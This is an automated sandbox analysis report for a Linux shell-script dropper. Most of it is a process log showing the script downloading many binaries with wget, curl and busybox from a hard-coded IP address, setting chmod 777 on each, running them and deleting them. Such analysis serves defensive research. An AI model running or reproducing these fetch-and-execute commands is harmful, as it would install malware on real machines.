Analysis Overview
SHA256
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
Threat Level: Shows suspicious behavior
The file 9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-21 01:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-21 01:30
Reported
2024-10-21 01:32
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
32s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | N/A |
| N/A | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | N/A |
| N/A | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | N/A |
| N/A | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | N/A |
| N/A | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | N/A |
| N/A | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | N/A |
| N/A | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | N/A |
| N/A | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | N/A |
| N/A | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | N/A |
| N/A | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | N/A |
| N/A | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | N/A |
| N/A | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | N/A |
| N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | N/A |
| N/A | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | N/A |
| N/A | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | N/A |
| N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | N/A |
| N/A | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | N/A |
| N/A | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | N/A |
| N/A | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | N/A |
| N/A | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | N/A |
| N/A | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | N/A |
| N/A | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | N/A |
| N/A | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | N/A |
| N/A | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | N/A |
| N/A | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | N/A |
| N/A | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /usr/bin/curl | N/A |
Processes
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/chmod
[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/rm
[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/wget
[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/chmod
[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/rm
[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/wget
[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/chmod
[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/rm
[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/wget
[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/chmod
[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/rm
[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/wget
[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/chmod
[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/rm
[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/wget
[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/chmod
[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/rm
[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/wget
[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/chmod
[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/rm
[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/wget
[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/chmod
[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/rm
[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/chmod
[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/rm
[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/wget
[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/chmod
[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/rm
[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/wget
[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/chmod
[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/rm
[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/wget
[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/chmod
[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/rm
[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/wget
[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/chmod
[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/rm
[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/wget
[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/chmod
[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/rm
[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/wget
[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/chmod
[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/rm
[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/wget
[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/chmod
[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/rm
[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/wget
[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/chmod
[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/rm
[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/wget
[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/chmod
[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/rm
[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/wget
[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/chmod
[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/rm
[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/wget
[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/chmod
[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/rm
[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/chmod
[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/rm
[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/wget
[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/chmod
[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/rm
[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/wget
[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/chmod
[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/rm
[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/wget
[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/chmod
[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/rm
[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/wget
[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/chmod
[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/rm
[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/wget
[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/chmod
[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/rm
[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/wget
[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/curl
